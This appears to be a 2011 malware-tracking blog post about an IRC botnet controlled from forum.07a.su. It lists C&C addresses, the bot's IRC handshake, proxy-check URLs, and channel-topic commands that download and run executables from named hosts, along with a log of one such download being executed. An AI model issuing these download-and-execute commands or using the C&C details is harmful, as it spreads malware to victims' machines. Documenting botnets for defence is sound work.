forum.07a.su(irc botnet hosted in Russian Federation Moscow Oao Webalta)

Remote Host Port Number

83.137.194.30 80

92.241.168.221:6789 ircd here

92.241.169.165:6789 ircd here

Resolved : [forum.07a.su] To [92.241.168.221]

Resolved : [forum.07a.su] To [92.241.169.165]

NICK [N00_USA_XP_0727651]x

MODE ##im -ix

USER SP2-465 * 0 :COMPUTERNAME

MODE [N00_USA_XP_0727651]x
A -ix
JOIN ##im
PRIVMSG #xxs :HTTP SET hxxp://whiteforum1.com/fud.exe

NICK [N00_USA_XP_3168281]x
PRIVMSG #xxs :HTTP SET hxxp://bisp.gov.pk/203.exe
PRIVMSG [N00_USA_XP_3168
@ :download; File download: 16.0KB to: C:MailServsice.exe @ 16.0KB/sec.
@ :download; Created process: “C:MailServsice.exe”, PID:
MODE ##im -ix
USER SP2-803 * 0 :COMPUTERNAME
MODE [N00_USA_XP_3168281]x
A -ix
JOIN ##im

forum.07a.su 92.241.168.221
svanka.nl
svanka.nl 83.137.194.30
www.sevy.eu.org
www.sevy.eu.org 199.27.134.39
www.google.com
www.google.com 74.125.39.104
www.google.de
www.google.de 74.125.39.103
www.proxysecurity.com
www.proxysecurity.com 74.52.152.82
Download URLs
http://83.137.194.30/azenv.php (svanka.nl)
http://83.137.194.30/azenv.php (svanka.nl)
http://199.27.134.39/azenv.php (www.sevy.eu.org)
http://74.125.39.104/ (www.google.com)
http://74.125.39.103/ (www.google.de)
http://74.52.152.82/azenv.php (www.proxysecurity.com)

C&C Server: 92.241.168.221:6789
Server Password:
Username: SP3-750
Nickname: [N00_DEU_XP_0334340]x
Channel: ##im (Password: )
Channeltopic: :.a -S -s|.world1 -S|.world1 hxxp://perfectkaiser.com/cs.exe C:MailService.exe 1|.h hxxp://whiteforum1.com/f.exe|.a s 25 0 0 -b -s|.a s 25 0 0 -b -r -e -s|.a s 25 0 0 -a -r -e -s
Outgoing connection to remote server: svanka.nl TCP port 80
Outgoing connection to remote server: svanka.nl TCP port 80
Outgoing connection to remote server: www.sevy.eu.org TCP port 80
Outgoing connection to remote server: www.google.com TCP port 80
Outgoing connection to remote server: www.google.de TCP port 80
Outgoing connection to remote server: www.proxysecurity.com TCP port 80

LINKS:

hxxp://perfectkaiser.com/cs.exe

hxxp://svanka.nl/azenv.php

hosting infos:

http://whois.domaintools.com/92.241.168.221

Categories: Uncategorized

Tags: irc bot

Previous post75mb malware samples

Next post64.31.42.67(ngrBot hosted in United States Limestone Networks Inc)

2 Comments

Anonymous - January 25, 2013 at 8:36 pm

perfectKaiser.com/cs.exe is not there its clean and nothing is found there. please explain why it is mentioned here

Pig - January 25, 2013 at 10:45 pm

are u dumb or what ? Saturday, October 22, 2011 the date of this post

gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)

89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)

2 Comments

Anonymous - January 25, 2013 at 8:36 pm

Pig - January 25, 2013 at 10:45 pm

Comments are closed